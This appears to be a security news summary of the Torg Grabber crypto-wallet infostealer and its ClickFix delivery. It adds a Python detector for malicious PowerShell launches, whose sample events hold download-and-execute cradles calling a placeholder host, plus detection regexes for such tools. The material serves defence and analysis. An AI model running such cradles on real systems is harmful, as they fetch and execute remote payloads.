New Torg Grabber infostealer malware targets 728 crypto wallets

Torg Grabber is a rapidly evolving infostealer that harvests sensitive data from 850 browser extensions — 728 of them cryptocurrency wallets — and also targets password managers, 2FA tools, note-taking apps, and desktop wallets. Gen Digital researchers found 334 unique samples compiled within three months, C2 domains registered weekly, advanced evasion techniques, and a standalone extraction tool called Underground that abuses Chrome's COM Elevation Service to recover the browser's App-Bound Encryption master key. #TorgGrabber #GenDigital

Keypoints

  • Targets 850 browser extensions, with 728 focused on cryptocurrency wallets including MetaMask, Phantom, TrustWallet, and Coinbase.
  • Initial access is gained via the ClickFix lure: a fake verification or error prompt copies a malicious PowerShell command to the clipboard and instructs the user to paste and run it themselves.
  • Researchers recorded 334 unique Torg Grabber samples between December 2025 and February 2026 and weekly registration of new C2 domains.
  • The malware employs multi-layer obfuscation, direct syscalls, reflective loading, and in-memory execution to evade detection, plus an App-Bound Encryption (ABE) bypass to reach Chrome's protected cookies and saved credentials.
  • Exfiltration moved from Telegram and a custom TCP channel to HTTPS fronted by Cloudflare.
  • Capabilities include credential, cookie and file theft, screenshots, host profiling, and execution of ChaCha-encrypted shellcode; the separate “Underground” tool extracts Chrome’s ABE master key.
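The ClickFix delivery step above leaves a recognisable trace in process-creation telemetry: PowerShell started from the shell that hosts the Run dialog (explorer.exe), usually with a hidden window, an encoded or download-and-execute command line, and a remote URL. The triage helper below is an added example written for this page, not code from the article or from Gen Digital. It runs over constructed Sysmon-style events (the field names, the `example.invalid` URLs and the choice of explorer.exe as the only "paste-and-run" parent are assumptions), decodes `-EncodedCommand` payloads so the cradle inside them is visible, and flags an event only when a download/execute cradle is combined with at least one further indicator.

```python
"""Flag ClickFix-style PowerShell launches in process-creation logs (added example)."""
import base64
import re

# Assumption: the paste-and-run lure lands in the Win+R Run dialog, so the
# interesting parent is explorer.exe. Extend this set for cmd.exe/Terminal variants.
RUN_DIALOG_PARENTS = {"explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

HIDDEN_RE = re.compile(r"[-/]w(?:indowstyle)?\s+hidden", re.I)
ENC_RE = re.compile(r"[-/]e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(
    r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
    r"downloadstring|net\.webclient|start-bitstransfer|curl|wget)\b", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)

# Constructed sample events (not real telemetry). Events 0 and 1 mimic the lure;
# events 2 and 3 are benign PowerShell use that the filter must not flag.
_ENC_PAYLOAD = base64.b64encode(
    "Invoke-Expression (Invoke-RestMethod 'https://example.invalid/p')".encode("utf-16le")
).decode("ascii")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/v)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + _ENC_PAYLOAD},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Get-ChildItem C:\Users"},
]


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -e/-enc/-EncodedCommand, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def clickfix_indicators(event):
    """List the ClickFix indicators present in one process-creation event."""
    if _basename(event.get("Image", "")) not in POWERSHELL_IMAGES:
        return []
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = []
    parent = _basename(event.get("ParentImage", ""))
    if parent in RUN_DIALOG_PARENTS:
        hits.append("parent " + parent)
    if HIDDEN_RE.search(cmdline):
        hits.append("hidden window")
    if decoded is not None:
        hits.append("encoded command")
    if CRADLE_RE.search(text):
        hits.append("download/execute cradle")
    if URL_RE.search(text):
        hits.append("remote URL")
    return hits


def triage(events):
    """Return flagged events: a cradle plus at least one more indicator."""
    flagged = []
    for idx, event in enumerate(events):
        hits = clickfix_indicators(event)
        if "download/execute cradle" in hits and len(hits) >= 2:
            flagged.append({"index": idx, "indicators": hits,
                            "decoded": decode_encoded_command(event.get("CommandLine", ""))})
    return flagged


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["index"], finding["indicators"], finding["decoded"])
```

Decoding the encoded command before matching is the part that matters: the base64 blob hides `Invoke-RestMethod` and the URL from a plain substring search, and the same decode step is what an analyst needs to recover the actual URL for blocking and hunting.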

Read More: https://www.bleepingcomputer.com/news/security/new-torg-grabber-infostealer-malware-targets-728-crypto-wallets/